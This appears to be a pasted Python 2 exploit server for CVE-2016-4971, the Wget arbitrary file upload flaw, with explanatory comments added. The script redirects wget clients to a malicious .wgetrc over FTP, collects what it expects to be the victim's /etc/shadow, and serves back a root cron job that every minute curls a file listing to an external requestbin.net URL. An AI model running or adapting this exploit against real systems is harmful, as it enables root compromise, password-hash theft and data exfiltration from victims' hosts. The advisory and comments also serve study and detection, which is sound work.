Sp4sm

Untitled

Apr 20th, 2018
  1. #!/usr/bin/env python
  2.  
  3. #
  4. # Wget 1.18 < Arbitrary File Upload Exploit
  5. # Dawid Golunski
  6. # dawid( at )legalhackers.com
  7. #
  8. # http://legalhackers.com/advisories/Wget-Arbitrary-File-Upload-Vulnerability-Exploit.txt
  9. #
  10. # CVE-2016-4971
  11. #
  12.  
  13. import SimpleHTTPServer
  14. import SocketServer
  15. import socket;
  16.  
class wgetExploit(SimpleHTTPServer.SimpleHTTPRequestHandler):
    """HTTP request handler for the CVE-2016-4971 proof of concept named in the file header.

    Only clients whose User-Agent header contains "Wget" are served the
    PoC flow; every other client gets a plain 200 "Nothing to see here...".
    For a wget client the handler performs two steps:

    * GET  -> 301 redirect to ftp://anonymous@FTP_HOST:FTP_PORT/.wgetrc.
      This exercises the HTTP-to-FTP redirect behaviour of the affected
      wget releases described in the advisory linked in the header; the
      status message states the file is expected to land in /root.
    * POST -> reads and prints the request body, then answers 200
      text/plain with ROOT_CRON.

    FTP_HOST, FTP_PORT and ROOT_CRON are module globals assigned *after*
    this class in the file; that is fine because they are only looked up
    while a request is being handled. The .wgetrc contents that make wget
    issue the POST and pick an output path are served by a separate FTP
    server and are not part of this script.
    """

    def do_GET(self):
        # This takes care of sending .wgetrc (step 1: redirect the client
        # to the .wgetrc hosted on the FTP server).

        print "We have a volunteer requesting " + self.path + " by GET :)\n"
        # Gate on the User-Agent header; anything else gets a bland 200.
        if "Wget" not in self.headers.getheader('User-Agent'):
            print "But it's not a Wget :("
            self.send_response(200)
            self.end_headers()
            self.wfile.write("Nothing to see here...")
            return

        print "Uploading .wgetrc via ftp redirect vuln. It should land in /root \n"
        # 301 with a Location pointing at an anonymous FTP URL whose last
        # path component is ".wgetrc" -- the redirect the advisory describes.
        self.send_response(301)
        new_path = '%s'%('ftp://anonymous@%s:%s/.wgetrc'%(FTP_HOST, FTP_PORT) )
        print "Sending redirect to %s \n"%(new_path)
        self.send_header('Location', new_path)
        self.end_headers()

    def do_POST(self):
        # In here we will receive extracted file and install a PoC cronjob
        # (step 2: accept whatever the client posts, reply with ROOT_CRON).

        print "We have a volunteer requesting " + self.path + " by POST :)\n"
        # Same User-Agent gate as do_GET.
        if "Wget" not in self.headers.getheader('User-Agent'):
            print "But it's not a Wget :( \n"
            self.send_response(200)
            self.end_headers()
            self.wfile.write("Nothing to see here...")
            return

        # Read exactly Content-Length bytes (0 when the header is absent)
        # and echo them. The message assumes the body is the victim's
        # /etc/shadow; whether that is true depends on what the served
        # .wgetrc told wget to post, which is not visible in this script.
        content_len = int(self.headers.getheader('content-length', 0))
        post_body = self.rfile.read(content_len)
        print "Received POST from wget, this should be the extracted /etc/shadow file: \n\n---[begin]---\n %s \n---[eof]---\n\n" % (post_body)

        print "Sending back a cronjob script as a thank-you for the file..."
        print "It should get saved in /etc/cron.d/wget-root-shell on the victim's host (because of .wgetrc we injected in the GET first response)"
        # The response body is the ROOT_CRON string; where wget writes it
        # is again decided by the injected .wgetrc, not by this handler.
        self.send_response(200)
        self.send_header('Content-type', 'text/plain')
        self.end_headers()
        self.wfile.write(ROOT_CRON)

        # NOTE(review): this message refers to /root/hacked-via-wget, but
        # the ROOT_CRON defined further down in this file does not create
        # that file -- it runs `ls` and curls the listing to an external
        # requestbin URL instead. The status text is stale relative to the
        # payload.
        print "\nFile was served. Check on /root/hacked-via-wget on the victim's host in a minute! :) \n"

        return

    def do_HEAD(self):
        # HEAD is handled exactly like GET (same redirect, same body writes).
        self.do_GET()
        return
  65.  
# --- Configuration ---------------------------------------------------------
# Address this script listens on, and the FTP server wget gets redirected to.
# Both point at the same host here; 192.168.56.x looks like a VirtualBox
# host-only lab network (assumption -- the script does not say).
HTTP_LISTEN_IP = '192.168.56.40'
HTTP_LISTEN_PORT = 80   # privileged port: binding it normally requires root
FTP_HOST = '192.168.56.40'
FTP_PORT = 21

# Body returned to the POST in wgetExploit.do_POST. As a cron.d entry it runs
# every minute as root, writes an `ls` listing to lss.txt (relative to cron's
# working directory) and posts that file to a requestbin.net URL.
# Detection-wise, the indicators on an affected host are therefore a new
# root cron job under /etc/cron.d and outbound curl traffic to
# requestbin.net -- not the /root/hacked-via-wget file the status messages
# in do_POST mention.
ROOT_CRON = "* * * * * root ls > lss.txt && curl -H 'Content-Type: text/xml' --data '@lss.txt' http://requestbin.net/r/1jwmnpq1 \n"

# Despite the name, `handler` is the TCPServer instance; wgetExploit is the
# per-request handler class passed to it.
handler = SocketServer.TCPServer((HTTP_LISTEN_IP, HTTP_LISTEN_PORT), wgetExploit)

print "Ready? Is your FTP server running?"

# Reachability check only: connect_ex returns 0 when a TCP connection to
# FTP_HOST:FTP_PORT succeeds. The socket is never closed or used afterwards.
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
result = sock.connect_ex((FTP_HOST, FTP_PORT))
if result == 0:
    print "FTP found open on %s:%s. Let's go then\n" % (FTP_HOST, FTP_PORT)
else:
    print "FTP is down :( Exiting."
    exit(1)

print "Serving wget exploit on port %s...\n\n" % HTTP_LISTEN_PORT

# Blocks here, dispatching requests to wgetExploit until interrupted.
handler.serve_forever()